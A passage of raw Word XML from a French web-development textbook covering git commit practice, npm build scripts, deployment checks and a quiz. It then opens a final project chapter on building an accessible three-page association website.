          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>test</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 xml:space="preserve">Ignorez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist</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Ajoutez un crochet de pré-commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 35.3 — Préparer un déploiement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   MISE EN PRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Construisez le site et vérifiez le dossier produit.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Lancez la construction.</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Contrôlez les chemins relatifs.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la taille des fichiers.</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35.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>git add index.html</w:t>
        <w:br/>
        <w:t>git commit -m "Corrige le titre de la page d'accueil"</w:t>
        <w:br/>
        <w:br/>
        <w:t>git add assets/styles/base.css</w:t>
        <w:br/>
        <w:t>git commit -m "Uniformise les espacements verticaux"</w:t>
        <w:br/>
        <w:br/>
        <w:t>git add assets/scripts/menu.js</w:t>
        <w:br/>
        <w:t>git commit -m "Rend le menu utilisable au clavier</w:t>
        <w:br/>
        <w:br/>
        <w:t>Le bouton expose aria-expanded et Échap referme le menu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un commit par intention : la relecture et le retour arrière deviennent possibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git add -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de préparer partiellement un fichier qui contient plusieurs modifications indépendantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 35.2</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "mon-site",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "private": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "type": "module",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "scripts": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "dev": "vite",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "build": "vite build",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "test": "vitest run",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lint": "eslint .",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "check": "npm run lint &amp;&amp; npm run test"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "devDependencies": { "vite": "^5.0.0", "vitest": "^1.0.0" }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unique sert à la fois localement et dans l'intégration continue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>private: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche une publication accidentelle sur le registre public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 35.3</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npm run build</w:t>
        <w:br/>
        <w:t>du -sh dist/*</w:t>
        <w:br/>
        <w:t>find dist -name "*.map" -delete   # si les sources ne doivent pas être</w:t>
        <w:br/>
        <w:t xml:space="preserve">  publiques</w:t>
        <w:br/>
        <w:br/>
        <w:t># Prévisualisation locale du résultat exact</w:t>
        <w:br/>
        <w:t>npm run preview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le dossier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne doit contenir que ce qui est nécessaire au site : ni sources, ni cartes de sources si elles exposent du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un chemin absolu codé en dur casse le site s'il est servi depuis un sous-répertoire.</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Quelle commande prépare des fichiers pour le prochain commit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git commit</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git add</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git push</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git status</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 xml:space="preserve">Pourquoi ne pas versionner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node_modules</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Il est trop volumineux et reproductible depuis le verrou</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Il contient des secrets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Il est binaire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Git l'interdit</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Quelle commande installe exactement les versions du verrou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npm install</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npm ci</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npm update</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npm audit</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 produit une chaîne de construction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Les sources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Des fichiers optimisés prêts à déployer</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 fichier de verrouillage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Les tests</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Quel est l'intérêt d'un crochet de pré-commit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Accélérer Git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Bloquer un commit qui échoue aux vérifications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Compresser les fichiers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Signer les commits</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> place les modifications dans l'index.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les dépendances se réinstallent à l'identique depuis le fichier de verrouillage.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> respecte strictement le fichier de verrouillage, ce qui rend l'intégration continue reproductible.</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Elle assemble, minifie et nomme les fichiers pour la production.</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Il exécute lint et tests avant l'enregistrement, au moment le moins coûteux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>36. Projet final : d'un dossier vide à un site en ligne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mettre en pratique les trente-cinq chapitres précédents en construisant, testant et publiant un site complet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 6 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 35</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Planifier un projet web de bout en bout.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Construire une page d'accueil, une page de contenu et un formulaire.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Appliquer les règles d'accessibilité et de performance.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Versionner, tester et publier le résultat.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Rédiger la documentation d'un projet livré.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.1 Le projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous allez réaliser le site vitrine d'une association culturelle : trois pages, un formulaire d'inscription à une lettre d'information, un thème clair et sombre, et une publication en ligne. Le contenu est fourni ; l'objectif est la qualité d'exécution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.115 — Huit livrables et leurs critères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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Livrable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Critère d'acceptation</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page d'accueil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En-tête, héros, programmes, pied de page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Page « Programmes »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Grille responsive, filtres accessibles</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page « Contact »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Formulaire validé, messages d'erreur annoncés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Feuilles de style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Trois fichiers, variables, aucun style en ligne</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>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Modules, aucun script bloquant, aucun </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Qualité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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Contrastes AA, navigation clavier complète, LCP &lt; 2,5 s</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Versionnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Historique lisible, messages explicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="631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README.md</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> avec installation et décisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.2 Étape 1 : cadrer avant de coder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un projet qui commence par du code produit souvent une structure à refaire. Trente minutes de cadrage économisent plusieurs heures.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : qui visite le site, avec quel appareil, dans quel contexte ?</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objectif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : quelle action unique doit être facilitée ?</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : quelles pages, quels textes, quelles images ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contraintes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : délai, hébergement, langue, accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mesure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : comment saura-t-on que le site fonctionne ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un cadrage en dix lignes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Cadrage — Association culturelle</w:t>
        <w:br/>
        <w:br/>
        <w:t>Public      : habitants de 25 à 65 ans, 70 % sur mobile</w:t>
        <w:br/>
        <w:t>Objectif    : inscription à la lettre d'information</w:t>
        <w:br/>
        <w:t>Pages       : accueil, programmes, contact</w:t>
        <w:br/>
        <w:t>Contrainte  : hébergement statique, budget nul</w:t>
        <w:br/>
        <w:t>Mesure      : nombre d'inscriptions par semaine</w:t>
        <w:br/>
        <w:br/>
        <w:t># Arborescence</w:t>
        <w:br/>
        <w:t>/            accueil</w:t>
        <w:br/>
        <w:t>/programmes  liste filtrable</w:t>
        <w:br/>
        <w:t>/contact     formulaire</w:t>
        <w:br/>
        <w:t>/mentions    page légale</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LE CONTENU D'ABORD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Écrivez les textes réels avant de dessiner les blocs. Une maquette remplie de faux texte masque les problèmes de longueur, de hiérarchie et de densité qui apparaissent avec le contenu vrai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.3 Étape 2 : la structure HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque page partage le même squelette : en-tête, navigation, contenu principal, pied de page. Les repères ARIA sont implicites grâce aux éléments sémantiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le squelette commun aux trois pages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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Association culturelle — Programmes&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="description" content="Ateliers, rencontres et spectacles de</w:t>
        <w:br/>
        <w:t xml:space="preserve">    l'association."&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="assets/styles/base.css"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="assets/styles/composants.css"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="assets/styles/pages.css"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;script type="module" src="assets/scripts/app.js"&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a class="lien-evitement" href="#contenu"&gt;Aller au contenu&lt;/a&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header class="entete"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;a href="/" class="entete__logo"&gt;</w:t>
